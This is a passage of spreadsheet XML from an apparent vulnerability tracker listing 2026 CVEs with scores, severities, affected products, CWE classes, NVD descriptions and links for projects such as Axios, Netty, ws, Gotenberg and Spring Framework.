        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42151</t>
        </is>
      </c>
      <c r="C1021" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1021" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1021" s="5" t="inlineStr">
        <is>
          <t>prometheus:prometheus</t>
        </is>
      </c>
      <c r="I1021" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-256, CWE-312</t>
        </is>
      </c>
      <c r="L1021" s="5" t="inlineStr">
        <is>
          <t>Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the client_secret field in the Azure AD remote write OAuth configuration (storage/remote/azuread) was typed as string instead of Secret. Prometheus redacts fields of type Secret when serving the configuration via the /-/config HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint. This issue has been patched in versions 3.5.3 and 3.11.3.</t>
        </is>
      </c>
      <c r="M1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42151</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42536</t>
        </is>
      </c>
      <c r="C1022" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1022" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1022" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I1022" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L1022" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42536</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43003</t>
        </is>
      </c>
      <c r="C1023" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1023" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1023" s="5" t="inlineStr">
        <is>
          <t>openstack:ironic_python_agent</t>
        </is>
      </c>
      <c r="I1023" s="5" t="inlineStr">
        <is>
          <t>2026-05-01</t>
        </is>
      </c>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-829</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack ironic-python-agent 1.0.0 through 11.5.0. Ironic Python Agent (IPA) sometimes executes grub-install from within a chroot of the deployed partition image, leading to code execution in the case of a malicious image.</t>
        </is>
      </c>
      <c r="M1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43003</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44250</t>
        </is>
      </c>
      <c r="C1024" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1024" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1024" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1024" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1024" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive number of state objects and collections, leading to memory exhaustion and an OutOfMemoryError. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44250</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44486</t>
        </is>
      </c>
      <c r="C1025" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1025" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1025" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1025" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44486</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44488</t>
        </is>
      </c>
      <c r="C1026" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1026" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1026" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1026" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1026" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured. This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44488</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44496</t>
        </is>
      </c>
      <c r="C1027" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1027" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1027" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1027" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1027" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie. The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44496</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44890</t>
        </is>
      </c>
      <c r="C1028" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1028" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1028" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1028" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1028" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's direct memory pool (OutOfDirectMemoryError), preventing legitimate connections from being processed. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44890</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45736</t>
        </is>
      </c>
      <c r="C1029" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1029" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1029" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I1029" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr">
        <is>
          <t>CWE-824, CWE-908</t>
        </is>
      </c>
      <c r="L1029" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.</t>
        </is>
      </c>
      <c r="M1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45736</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45741</t>
        </is>
      </c>
      <c r="C1030" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1030" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1030" s="5" t="inlineStr"/>
      <c r="I1030" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="L1030" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, the IsPublicIP function in pkg/gotenberg/outbound.go does not reject the 2002::/16 6to4 prefix, the 64:ff9b::/96 and 64:ff9b:1::/48 NAT64 prefixes, the fec0::/10 deprecated site-local prefix, Teredo, and other transition prefixes that can embed or route to non-public IPv4 destinations. The addr.Unmap operation only handles IPv4-mapped IPv6 addresses, so a crafted DNS AAAA record can cause the outbound HTTP client to treat an address wrapping an internal destination such as 169.254.169.254 as public. An unauthenticated attacker can use a conversion route with WithDenyPrivateIPs enabled to reach cloud metadata services, and the Chromium URL conversion route can return the internal response as a PDF, potentially exposing cloud credentials. Exploitation requires a deployment whose host routes the relevant IPv6 prefix, such as a dual-stack or NAT64-enabled environment. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45741</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45742</t>
        </is>
      </c>
      <c r="C1031" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1031" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1031" s="5" t="inlineStr"/>
      <c r="I1031" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1031" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. From 8.10.0 until 8.33.0, the newContext function in pkg/modules/api/context.go starts one errgroup.Go goroutine for each multipart downloadFrom entry and allows those goroutines to concurrently write to the shared ctx.files, ctx.diskToOriginal, and ctx.filesByField maps and slices. Go maps and slices are not safe for concurrent mutation, so a crafted multipart request containing many downloadFrom entries can trigger a data race and terminate the process with a fatal concurrent map writes runtime error. The default configuration enables downloadFrom and disables authentication, allowing an unauthenticated remote attacker to crash an exposed conversion service and cause a denial of service. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45742</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46625</t>
        </is>
      </c>
      <c r="C1032" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1032" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1032" s="5" t="inlineStr">
        <is>
          <t>js-cookie:javascript_cookie, redhat:3scale_api_management, redhat:ansible_automation_platform, redhat:enterprise_linux, redhat:openshift_ai, redhat:openshift_lightspeed</t>
        </is>
      </c>
      <c r="I1032" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L1032" s="5" t="inlineStr">
        <is>
          <t>JavaScript Cookie is a JavaScript API for handling cookies, client-side. Prior to version 3.0.7, js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys. Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down. This issue has been patched in version 3.0.7.</t>
        </is>
      </c>
      <c r="M1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46625</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47885</t>
        </is>
      </c>
      <c r="C1033" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1033" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1033" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1033" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1033" s="5" t="inlineStr">
        <is>
          <t>The PartEventHttpMessageReader in Spring WebFlux does not enforce the maxPartSize limit when maxInMemorySize is set to -1.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28</t>
        </is>
      </c>
      <c r="M1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47885</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47886</t>
        </is>
      </c>
      <c r="C1034" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1034" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1034" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1034" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1034" s="5" t="inlineStr">
        <is>
          <t>Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack when the power operator (^) is used with a BigDecimal or BigInteger operand and a large exponent value.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47886</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47888</t>
        </is>
      </c>
      <c r="C1035" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1035" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1035" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1035" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1035" s="5" t="inlineStr">
        <is>
          <t>A Spring RSocket application is exposed to a memory leak via a malformed SETUP frame.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.0.RELEASE - 5.2.25.RELEASE</t>
        </is>
      </c>
      <c r="M1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47888</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47889</t>
        </is>
      </c>
      <c r="C1036" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1036" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1036" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1036" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr">
        <is>
          <t>CWE-1275</t>
        </is>
      </c>
      <c r="L1036" s="5" t="inlineStr">
        <is>
          <t>A WebFlux application running on the Jetty 12 Core reactive adapter serializes response cookies without the sameSite attribute.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19</t>
        </is>
      </c>
      <c r="M1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47889</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48779</t>
        </is>
      </c>
      <c r="C1037" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1037" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1037" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I1037" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr">
        <is>
          <t>CWE-1050, CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1037" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.</t>
        </is>
      </c>
      <c r="M1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48779</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48804</t>
        </is>
      </c>
      <c r="C1038" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1038" s="5" t="inlineStr"/>
      <c r="F1038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1038" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1038" s="5" t="inlineStr"/>
      <c r="I1038" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>python-socketio is a Python implementation of the Socket.IO realtime client and server. The python-socketio server stores binary `EVENT` and `ACK` messages in memory while it waits to receive their binary attachments. Once all the attachments are received, these messages are then processed. Prior to version 5.16.4, an attacker can submit a binary message and intentionally omit sending one or more of its attachments to cause the message along with the partial list of received attachments to stay in memory for a long time. Version 5.16.4 takes the following measures to address this issue: Binary packets are only accepted from authenticated clients and, when a client disconnects, the server checks if there is a partial binary message being held for the client and deletes it.</t>
        </is>
      </c>
      <c r="M1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48804</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49362</t>
        </is>
      </c>
      <c r="C1039" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1039" s="5" t="inlineStr"/>
      <c r="F1039" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1039" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1039" s="5" t="inlineStr"/>
      <c r="I1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can create arbitrary durable queues via the CORE protocol, leading to unauthorized broker state manipulation and potential denial of service.
